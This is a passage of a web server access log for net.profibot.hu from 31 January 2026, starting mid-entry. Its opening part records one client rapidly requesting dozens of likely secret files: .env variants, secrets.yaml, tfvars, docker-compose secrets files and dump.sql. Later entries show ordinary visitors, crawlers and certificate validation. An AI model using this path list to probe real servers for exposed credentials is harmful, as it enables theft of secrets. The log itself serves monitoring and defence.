(X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/.env_4" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/orders/.env" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/.env_13" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/manifests/secrets.yaml" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/.env.v13" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/ecommerce/.env" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/staging.tfvars" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/.env.bak3" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/.env.2025-06" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/.env.16" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/.env.202512" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/.env.old4" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/.env.5" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/.env.backup.2024" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/charts/values.yaml" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/.env.2024.bak" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/.env.old13" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/.env_7" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/.env.20" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/.env.old7" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/.env.backup7" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/.env_6" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/.env.v7" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/.envrc" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/.env.backup19" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/.env.bak19" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/.env.2024-03" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/.env.backup8" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/.env.19" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/.env.v17" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/magento2/.env" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/docker-compose.local.yml" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/.env.10" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/docker-compose.production.yml" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/.env.2024-08" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/.env_10" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/docker-compose.secrets.yml" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/.env.v18" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/debug/.env" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/.env.202408" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/.env.2024-12" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/.env.backup9" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/.debug/.env" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/trace/.env" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/.vscode/settings.json" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/dump.sql" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/symfony/.env.local" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/.env.v3" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/.env.202502" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/.env.bak10" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/.env.v14" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:40:10 +0000] - 200 200 - GET https net.profibot.hu "/" [Client 35.204.166.221] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Scrapy/2.13.4 (+https://scrapy.org)" "-" +[31/Jan/2026:18:09:39 +0000] - 200 200 - GET https net.profibot.hu "/" [Client 84.254.106.197] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "-" +[31/Jan/2026:18:09:39 +0000] - 200 200 - GET https net.profibot.hu "/images/favicon/safari-pinned-tab.svg" [Client 84.254.106.197] [Length 5718] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "-" +[31/Jan/2026:18:09:39 +0000] - 200 200 - GET https net.profibot.hu "/js/lkk_ch.js" [Client 84.254.106.197] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "-" +[31/Jan/2026:18:09:39 +0000] - 200 200 - GET https net.profibot.hu "/images/favicon/site.webmanifest" [Client 84.254.106.197] [Length 458] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "-" +[31/Jan/2026:18:09:39 +0000] - 200 200 - GET https net.profibot.hu "/images/logo-no-text.svg" [Client 84.254.106.197] [Length 9008] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "-" +[31/Jan/2026:18:09:39 +0000] - 200 200 - GET https net.profibot.hu "/images/favicon/favicon-16x16.png" [Client 84.254.106.197] [Length 1512] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "-" +[31/Jan/2026:18:09:39 +0000] - 200 200 - GET https net.profibot.hu "/images/favicon/favicon.ico" [Client 84.254.106.197] [Length 15086] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "-" +[31/Jan/2026:18:09:39 +0000] - 200 200 - GET https net.profibot.hu "/js/twint_ch.js" [Client 84.254.106.197] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "-" +[31/Jan/2026:18:09:39 +0000] - 200 200 - GET https net.profibot.hu "/css/support_parent.css" [Client 84.254.106.197] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "-" +[31/Jan/2026:18:09:40 +0000] - 200 200 - GET https net.profibot.hu "/images/favicon/favicon-32x32.png" [Client 84.254.106.197] [Length 2696] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "-" +[31/Jan/2026:18:09:40 +0000] - 200 200 - GET https net.profibot.hu "/images/favicon/apple-touch-icon.png" [Client 84.254.106.197] [Length 16709] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "-" +[31/Jan/2026:18:24:34 +0000] - 200 200 - GET https net.profibot.hu "/" [Client 23.27.145.250] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux i686; rv:109.0) Gecko/20100101 Firefox/120.0" "-" +[31/Jan/2026:18:34:16 +0000] - 200 200 - GET https net.profibot.hu "/" [Client 52.4.193.97] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 Edg/138.0.0.0 ;Build/0220;" "-" +[31/Jan/2026:18:55:50 +0000] - - 301 - GET http net.profibot.hu "/" [Client 52.4.193.97] [Length 166] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36" "-" +[31/Jan/2026:18:55:51 +0000] - 200 200 - GET https net.profibot.hu "/" [Client 52.4.193.97] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36" "-" +[31/Jan/2026:19:14:23 +0000] - 200 200 - GET https net.profibot.hu "/" [Client 84.254.106.197] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "-" +[31/Jan/2026:19:14:23 +0000] - 200 200 - GET https net.profibot.hu "/images/favicon/favicon-16x16.png" [Client 84.254.106.197] [Length 1512] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "-" +[31/Jan/2026:19:14:23 +0000] - 200 200 - GET https net.profibot.hu "/images/favicon/site.webmanifest" [Client 84.254.106.197] [Length 458] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "-" +[31/Jan/2026:19:14:23 +0000] - 200 200 - GET https net.profibot.hu "/js/lkk_ch.js" [Client 84.254.106.197] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "-" +[31/Jan/2026:19:14:23 +0000] - 200 200 - GET https net.profibot.hu "/css/support_parent.css" [Client 84.254.106.197] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "-" +[31/Jan/2026:19:14:23 +0000] - 200 200 - GET https net.profibot.hu "/images/favicon/safari-pinned-tab.svg" [Client 84.254.106.197] [Length 5718] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "-" +[31/Jan/2026:19:14:23 +0000] - 200 200 - GET https net.profibot.hu "/images/favicon/favicon.ico" [Client 84.254.106.197] [Length 15086] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "-" +[31/Jan/2026:19:14:23 +0000] - 200 200 - GET https net.profibot.hu "/js/twint_ch.js" [Client 84.254.106.197] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "-" +[31/Jan/2026:19:14:23 +0000] - 200 200 - GET https net.profibot.hu "/images/favicon/apple-touch-icon.png" [Client 84.254.106.197] [Length 16709] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "-" +[31/Jan/2026:19:14:23 +0000] - 200 200 - GET https net.profibot.hu "/images/favicon/favicon-32x32.png" [Client 84.254.106.197] [Length 2696] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "-" +[31/Jan/2026:19:14:23 +0000] - 200 200 - GET https net.profibot.hu "/images/logo-no-text.svg" [Client 84.254.106.197] [Length 9008] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "-" +[31/Jan/2026:19:28:24 +0000] - - 301 - GET http net.profibot.hu "/" [Client 143.198.224.86] [Length 166] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36" "-" +[31/Jan/2026:19:28:25 +0000] - - 301 - GET http net.profibot.hu "/favicon.ico" [Client 143.198.224.86] [Length 166] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36" "http://net.profibot.hu/" +[31/Jan/2026:19:28:25 +0000] - 200 200 - GET https net.profibot.hu "/" [Client 143.198.224.86] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36" "-" +[31/Jan/2026:19:28:30 +0000] - 200 200 - GET https net.profibot.hu "/images/favicon/favicon-32x32.png" [Client 143.198.224.86] [Length 2696] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36" "https://net.profibot.hu/" +[31/Jan/2026:21:48:55 +0000] - - 301 - HEAD http net.profibot.hu "/" [Client 176.65.148.161] [Length 0] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "-" +[31/Jan/2026:21:48:57 +0000] - 200 200 - HEAD https net.profibot.hu "/" [Client 176.65.148.161] [Length 0] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "http://net.profibot.hu" +[31/Jan/2026:21:48:57 +0000] - - 301 - GET http net.profibot.hu "/" [Client 176.65.148.161] [Length 166] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "-" +[31/Jan/2026:21:48:57 +0000] - 206 206 - GET https net.profibot.hu "/" [Client 176.65.148.161] [Length 1451] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "http://net.profibot.hu" +[31/Jan/2026:21:48:57 +0000] - - 301 - HEAD http net.profibot.hu "/_next" [Client 176.65.148.161] [Length 0] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "-" +[31/Jan/2026:21:48:58 +0000] - 200 200 - HEAD https net.profibot.hu "/_next" [Client 176.65.148.161] [Length 0] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "http://net.profibot.hu/_next" +[31/Jan/2026:22:52:58 +0000] - 200 200 - GET https net.profibot.hu "/" [Client 84.254.106.197] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "-" +[31/Jan/2026:22:52:59 +0000] - 200 200 - GET https net.profibot.hu "/images/favicon/favicon-32x32.png" [Client 84.254.106.197] [Length 2696] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "-" +[31/Jan/2026:22:52:59 +0000] - 200 200 - GET https net.profibot.hu "/js/twint_ch.js" [Client 84.254.106.197] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "-" +[31/Jan/2026:22:52:59 